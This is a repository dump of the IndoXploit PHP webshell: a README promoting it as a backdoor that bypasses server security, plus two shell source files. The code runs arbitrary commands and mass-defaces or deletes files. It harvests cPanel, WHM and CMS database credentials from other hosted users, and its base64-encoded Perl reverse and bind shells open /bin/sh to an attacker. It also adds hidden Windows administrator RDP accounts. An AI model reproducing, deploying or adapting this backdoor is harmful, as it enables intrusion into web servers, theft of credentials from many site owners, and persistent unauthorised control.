├── LICENSE ├── README.md ├── screenshot ├── idx-interface.PNG ├── indoxploit-login.PNG └── ss.txt ├── shell-v2.php └── shell-v3.php /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 ZAFKIEL.net 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # IndoXploit Webshell V.3 2 | 3 | IndoXploit webshell V.3 is an PHP based webshell or backdoor with unique and usefull features. This webshell is originally coded by [**agussetyar**](https://github.com/agussetyar) from **IndoXploit Coders Team**. IndoXploit Shell has been mentioned repeatedly by the coder that it will make you easily bypass server security. With this shell you can comfortably bypass the server firewall from most secure servers. It is one of the hacker's most preferred backdoor shell. 4 | 5 | **Usage of indoxploit shell for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program** 6 | 7 | --- 8 | 9 | ## Screenshot 10 | - login 11 |  12 | Default Password : **IndoXploit** 13 | 14 | - interface 15 |  16 | Webshell Interface 17 | 18 | ## Features 19 | - Mass Password Change 20 | - Fake Root 21 | - Cpanel Crack 22 | - Mass Deface/Delete File 23 | - Zone-H Mass Submit 24 | 25 | ## How to Use 26 | - ***Read File*** 27 | ~~~ 28 | usage: rf [filename] 29 | example: rf /etc/passwd 30 | ~~~ 31 | 32 | - Spawn File/Tools 33 | ~~~ 34 | usage: spawn [name] 35 | ~~~ 36 | 37 | [name] 38 | - Adminer (adminer) 39 | - WebConsole (webconsole) 40 | - CGI Telnet 1 (cgitelnet1) 41 | - CGI Telnet 2 (cgitelnet2) 42 | - PHPINFO (phpinfo) 43 | 44 | example: 45 | ~~~ 46 | spawn adminer 47 | spawn webconsole 48 | spawn cgitelnet1 49 | ~~~ 50 | 51 | - ***Jumping*** 52 | ~~~ 53 | usage: jumping 54 | ~~~ 55 | 56 | - ***Config Grabber*** 57 | ~~~ 58 | usage: idxconfig 59 | ~~~ 60 | 61 | - ***Symlink*** 62 | ~~~ 63 | usage: symlink 64 | ~~~ 65 | 66 | - ***Reverse Shell*** 67 | 68 | ***[Back Connect]*** 69 | ~~~ 70 | usage: rvr bc [IP] [PORT] [TYPE] 71 | ~~~ 72 | Example: 73 | ~~~ 74 | rvr bc 127.0.0.1 1337 bash 75 | rvr bc 127.0.0.1 1337 perl 76 | ~~~ 77 | 78 | ***Bind Port*** 79 | ~~~ 80 | usage: rvr bp [PORT] [TYPE] 81 | ~~~ 82 | Example: 83 | ~~~ 84 | rvr bp 1337 perl 85 | ~~~ 86 | 87 | - ***KRDP - Create RDP Account (for windows server only)*** 88 | ~~~ 89 | usage: krdp 90 | ~~~ 91 | - ***Logout From Shell*** 92 | ~~~ 93 | usage: logout 94 | ~~~ 95 | - ***Kill Backdoor*** 96 | ~~~ 97 | usage: killme 98 | ~~~ 99 | 100 | ## Contribute 101 | Drop an email at **shu@indoxploit.or.id** and tell us what your suggestions about how to improve this webshell. 102 | 103 | ## Article 104 | - [Download Shell Backdoor IndoXploit V.3](https://exploit.linuxsec.org/download-shell-backdoor-indoxploit-v-3/) 105 | - [Download Shell backdoor Indoxploit V.2](https://exploit.linuxsec.org/shell-indoxploit-v2-dirilis/) 106 | - [Download IndoXploit WebShell First Edition](https://exploit.linuxsec.org/indoxploit-shell-v1/) 107 | 108 | ## Disclaimer 109 | Any actions and or activities related to the material contained within this tool is solely your responsibility.The misuse of the information in this tool can result in criminal charges brought against the persons in question. 110 | 111 | Note: modifications, changes, or changes to this code can be accepted, however, every public release that uses this code must be approved by writing this tool (indoxploit team) 112 | -------------------------------------------------------------------------------- /screenshot/idx-interface.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xAsuka/indoxploit-shell/4c6fc969f80a7ca73f7e8751730253a6bb7f29ba/screenshot/idx-interface.PNG -------------------------------------------------------------------------------- /screenshot/indoxploit-login.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xAsuka/indoxploit-shell/4c6fc969f80a7ca73f7e8751730253a6bb7f29ba/screenshot/indoxploit-login.PNG -------------------------------------------------------------------------------- /screenshot/ss.txt: -------------------------------------------------------------------------------- 1 | dd 2 | -------------------------------------------------------------------------------- /shell-v2.php: -------------------------------------------------------------------------------- 1 | 28 | 29 |
30 |57 | ___________________________ 58 | < root@indoxploit:~# w00t??? > 59 | --------------------------- 60 | \ , , 61 | \ /( )` 62 | \ \ \___ / | 63 | /- _ `-/ ' 64 | (/\/ \ \ /\ 65 | / / | ` \ 66 | O O ) / | 67 | `-^--'`< ' 68 | (_.) _ ) / 69 | `.___/` / 70 | `-----' / 71 | <----. __ / __ \ 72 | <----|====O)))==) \) /==== 73 | <----' `--' `.__,' \ 74 | | | 75 | \ / 76 | ______( (_ / \______ 77 | ,' ,-----' | \ 78 | `--{__________) \/ 79 | 80 |81 |
".exe($_POST['cmd']).""; 483 | } 484 | } elseif($_GET['do'] == 'mass_deface') { 485 | function sabun_massal($dir,$namafile,$isi_script) { 486 | if(is_writable($dir)) { 487 | $dira = scandir($dir); 488 | foreach($dira as $dirb) { 489 | $dirc = "$dir/$dirb"; 490 | $lokasi = $dirc.'/'.$namafile; 491 | if($dirb === '.') { 492 | file_put_contents($lokasi, $isi_script); 493 | } elseif($dirb === '..') { 494 | file_put_contents($lokasi, $isi_script); 495 | } else { 496 | if(is_dir($dirc)) { 497 | if(is_writable($dirc)) { 498 | echo "[DONE] $lokasi
Can't read /etc/passwd"); 617 | while($passwd = fgets($etc)) { 618 | if($passwd == "" || !$etc) { 619 | echo "Can't read /etc/passwd"; 620 | } else { 621 | preg_match_all('/(.*?):x:/', $passwd, $user_config); 622 | foreach($user_config[1] as $user_idx) { 623 | $user_config_dir = "/home/$user_idx/public_html/"; 624 | if(is_readable($user_config_dir)) { 625 | $grab_config = array( 626 | "/home/$user_idx/.my.cnf" => "cpanel", 627 | "/home/$user_idx/.accesshash" => "WHM-accesshash", 628 | "$user_config_dir/po-content/config.php" => "Popoji", 629 | "$user_config_dir/vdo_config.php" => "Voodoo", 630 | "$user_config_dir/bw-configs/config.ini" => "BosWeb", 631 | "$user_config_dir/config/koneksi.php" => "Lokomedia", 632 | "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia", 633 | "$user_config_dir/clientarea/configuration.php" => "WHMCS", 634 | "$user_config_dir/whm/configuration.php" => "WHMCS", 635 | "$user_config_dir/whmcs/configuration.php" => "WHMCS", 636 | "$user_config_dir/forum/config.php" => "phpBB", 637 | "$user_config_dir/sites/default/settings.php" => "Drupal", 638 | "$user_config_dir/config/settings.inc.php" => "PrestaShop", 639 | "$user_config_dir/app/etc/local.xml" => "Magento", 640 | "$user_config_dir/joomla/configuration.php" => "Joomla", 641 | "$user_config_dir/configuration.php" => "Joomla", 642 | "$user_config_dir/wp/wp-config.php" => "WordPress", 643 | "$user_config_dir/wordpress/wp-config.php" => "WordPress", 644 | "$user_config_dir/wp-config.php" => "WordPress", 645 | "$user_config_dir/admin/config.php" => "OpenCart", 646 | "$user_config_dir/slconfig.php" => "Sitelok", 647 | "$user_config_dir/application/config/database.php" => "Ellislab"); 648 | foreach($grab_config as $config => $nama_config) { 649 | $ambil_config = file_get_contents($config); 650 | if($ambil_config == '') { 651 | } else { 652 | $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w"); 653 | fputs($file_config,$ambil_config); 654 | } 655 | } 656 | } 657 | } 658 | } 659 | } 660 | echo "
"; 669 | foreach($urls as $url) { 670 | $url = str_replace(array("http://","www."), "", strtolower($url)); 671 | $etc = "/etc/passwd"; 672 | $f = fopen($etc,"r"); 673 | while($gets = fgets($f)) { 674 | $pecah = explode(":", $gets); 675 | $user = $pecah[0]; 676 | $dir_user = "/hsphere/local/home/$user"; 677 | if(is_dir($dir_user) === true) { 678 | $url_user = $dir_user."/".$url; 679 | if(is_readable($url_user)) { 680 | $i++; 681 | $jrw = "[R] $url_user"; 682 | if(is_writable($url_user)) { 683 | $jrw = "[RW] $url_user"; 684 | } 685 | echo $jrw.""; 695 | } else { 696 | echo '
"; 686 | } 687 | } 688 | } 689 | } 690 | if($i == 0) { 691 | } else { 692 | echo "
Total ada ".$i." Kamar di ".$ip; 693 | } 694 | echo "
"; 713 | foreach($urls as $url) { 714 | $url = str_replace("www.", "", $url); 715 | $web_vh = "/var/www/".$vh[1]."/$url/httpdocs"; 716 | if(is_dir($web_vh) === true) { 717 | if(is_readable($web_vh)) { 718 | $i++; 719 | $jrw = "[R] $web_vh"; 720 | if(is_writable($web_vh)) { 721 | $jrw = "[RW] $web_vh"; 722 | } 723 | echo $jrw.""; 732 | } else { 733 | echo '
"; 724 | } 725 | } 726 | } 727 | if($i == 0) { 728 | } else { 729 | echo "
Total ada ".$i." Kamar di ".$ip; 730 | } 731 | echo "
"; 744 | $etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd"); 745 | while($passwd = fgets($etc)) { 746 | if($passwd == '' || !$etc) { 747 | echo "Can't read /etc/passwd"; 748 | } else { 749 | preg_match_all('/(.*?):x:/', $passwd, $user_jumping); 750 | foreach($user_jumping[1] as $user_idx_jump) { 751 | $user_jumping_dir = "/home/$user_idx_jump/public_html"; 752 | if(is_readable($user_jumping_dir)) { 753 | $i++; 754 | $jrw = "[R] $user_jumping_dir"; 755 | if(is_writable($user_jumping_dir)) { 756 | $jrw = "[RW] $user_jumping_dir"; 757 | } 758 | echo $jrw; 759 | if(function_exists('posix_getpwuid')) { 760 | $domain_jump = file_get_contents("/etc/named.conf"); 761 | if($domain_jump == '') { 762 | echo " => ( gabisa ambil nama domain nya )"; 786 | } 787 | echo "
"; 763 | } else { 764 | preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); 765 | foreach($domains_jump[1] as $dj) { 766 | $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); 767 | $user_jumping_url = $user_jumping_url['name']; 768 | if($user_jumping_url == $user_idx_jump) { 769 | echo " => ( $dj )
"; 770 | break; 771 | } 772 | } 773 | } 774 | } else { 775 | echo "
"; 776 | } 777 | } 778 | } 779 | } 780 | } 781 | if($i == 0) { 782 | } else { 783 | echo "
Total ada ".$i." Kamar di ".$ip; 784 | } 785 | echo "
".$out."\n".exe("ps aux | grep bp.pl").""; 1698 | unlink("/tmp/bp.pl"); 1699 | } 1700 | $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; 1701 | if(isset($_POST['sub_bc'])) { 1702 | $f_bc = fopen("/tmp/bc.pl", "w"); 1703 | fwrite($f_bc, base64_decode($bind_connect_p)); 1704 | fclose($f_bc); 1705 | 1706 | $ipbc = $_POST['ip_bc']; 1707 | $port = $_POST['port_bc']; 1708 | $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &"); 1709 | sleep(1); 1710 | echo "
".$out."\n".exe("ps aux | grep bc.pl").""; 1711 | unlink("/tmp/bc.pl"); 1712 | } 1713 | } elseif($_GET['do'] == 'krdp_shell') { 1714 | if(strtolower(substr(PHP_OS, 0, 3)) === 'win') { 1715 | if($_POST['create']) { 1716 | $user = htmlspecialchars($_POST['user']); 1717 | $pass = htmlspecialchars($_POST['pass']); 1718 | if(preg_match("/$user/", exe("net user"))) { 1719 | echo "[INFO] -> user $user sudah ada"; 1720 | } else { 1721 | $add_user = exe("net user $user $pass /add"); 1722 | $add_groups1 = exe("net localgroup Administrators $user /add"); 1723 | $add_groups2 = exe("net localgroup Administrator $user /add"); 1724 | $add_groups3 = exe("net localgroup Administrateur $user /add"); 1725 | echo "[ RDP ACCOUNT INFO ]
$cek"; 1759 | } else { 1760 | echo "[ belum ada ]"; 1761 | } 1762 | } elseif($_POST['opsi'] == '2') { 1763 | $cek = exe("net user $user indoxploit"); 1764 | if(preg_match("/$user/", exe("net user"))) { 1765 | echo "[change password: indoxploit] -> "; 1766 | if($cek) { 1767 | echo "Berhasil"; 1768 | } else { 1769 | echo "Gagal"; 1770 | } 1771 | } else { 1772 | echo "[INFO] -> user $user belum ada"; 1773 | } 1774 | } elseif($_POST['opsi'] == '3') { 1775 | $cek = exe("net user $user /DELETE"); 1776 | if(preg_match("/$user/", exe("net user"))) { 1777 | echo "[remove user: $user] -> "; 1778 | if($cek) { 1779 | echo "Berhasil"; 1780 | } else { 1781 | echo "Gagal"; 1782 | } 1783 | } else { 1784 | echo "[INFO] -> user $user belum ada"; 1785 | } 1786 | } else { 1787 | // 1788 | } 1789 | } else { 1790 | echo "-- Create RDP --
$act_dir | "; 1960 | echo "||||||
edit | rename | delete | download | "; 1998 | echo "